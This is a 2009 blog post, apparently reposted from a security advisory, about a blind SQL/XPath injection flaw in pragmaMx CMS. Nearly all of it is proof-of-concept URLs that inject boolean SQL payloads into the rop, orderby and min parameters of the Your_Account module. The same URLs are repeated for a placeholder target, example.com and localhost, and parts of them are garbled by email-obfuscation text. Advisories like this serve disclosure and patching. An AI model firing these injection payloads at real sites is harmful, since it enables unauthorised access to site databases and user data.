Minggu, 27 Desember 2009

pragmaMx CMS Blind SQL/XPath Injection vulnerability

###########################################

#

# CMS Name : pragmaMx ( All Version )

#

# Bug Type : Blind SQL/XPath Injection vulnerability

#

# Found by : Hadi Kiamarsi

#

# Contact : hadikiamarsi [at] hotmail.com

#

# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/
pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download

#

###########################################

PoC :

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]

http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch

http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0

example :

http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+an
d+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]

http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD
"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch

http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=
111-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD

http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=
111-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0

local Example :

http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and
+31337-31337=0+--+&id=111-222-1933email (at) address (dot) tst [email concealed]

http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"
+and+31337-31337=0+--+&cid=0&jumpswitch=Switch

http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=1
11-222-1933email (at) address (dot) tst [email concealed]&min=0'+and+31337-31337='0&orderby=dateD

http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=1
11-222-1933email (at) address (dot) tst [email concealed]"+and+31337-31337="0
by alfian sapurta k at 05.11
Labels:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)